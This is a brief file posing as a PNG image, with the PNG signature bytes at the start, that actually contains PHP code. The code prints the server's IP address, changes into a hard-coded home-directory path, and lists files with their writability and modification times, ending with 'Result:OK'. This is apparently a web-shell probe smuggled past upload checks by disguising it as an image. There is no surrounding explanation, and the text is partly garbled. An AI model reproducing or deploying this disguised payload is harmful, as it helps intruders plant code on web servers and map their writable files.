\x89\x50\x4E\x47\x0D\x0A\x1A\x0A PNG  \x89\x50\x4E\x47\x0D\x0A\x1A\x0A ";$ip = $_SERVER["SERVER_ADDR"]; if(empty($ip)) $ip = @gethostbyname($_SERVER["SERVER_NAME"]);print("$ip\n
");$path = "/home/boa1684427/tmp/docs/";if(@chdir($path)) { $curd = $path; } else { $curd = @getcwd(); $curd = rtrim($curd, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR; $curd = str_replace("\\", "/", $curd); } print("\n
");print("Current dir: $curd" . is_writable($curd) . "\n
");foreach (@glob("*") as $fn) is_dir($fn) ? print("$fn" . is_writable($fn) . "" . @date("Y-m-d H:i:s", @filemtime($fn)) . "\n
") : print("$fn" . filesize($fn) . "" . is_writable($fn) . "" . @date("Y-m-d H:i:s", @filemtime($fn)) . "\n
");echo "Result:OK"; echo ""; die;